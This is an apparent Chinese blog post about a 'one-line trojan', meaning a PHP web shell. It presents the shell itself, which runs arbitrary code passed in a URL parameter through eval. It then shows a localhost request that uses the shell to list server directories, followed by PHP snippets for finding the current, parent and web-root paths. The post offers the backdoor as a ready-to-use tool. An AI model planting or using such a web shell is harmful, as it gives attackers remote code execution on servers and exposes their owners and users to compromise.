一句话木马

一句话木马

<?php

//print_r($_GET);

//echo stripcslashes($_GET['e']);
eval(stripcslashes($_GET['e']));
?>

 

http://127.0.0.1/gj.php?e=$a=dirname(__FILE__);$b=opendir($a);while($row=readdir($b)){echo%20$row.'%3Cbr%20/%3E';}

 

就可以输出目录了 

 

// 获取当前目录
echo realpath("."). "<br>"; 
echo getcwd() . "<br>"; 
// 获取上级目录
echo realpath(".."). "<br>"; 
// 获取网站根目录
echo $_SERVER['DOCUMENT_ROOT'];
// 获取目录信息
$path_parts = pathinfo(__FILE__); 
echo $path_parts["dirname"] . "<br>"; 
echo $path_parts["basename"] . "<br>"; 
echo $path_parts["extension"] . "<br>"; 
echo dirname(__FILE__);

你可能感兴趣的:(一句话木马)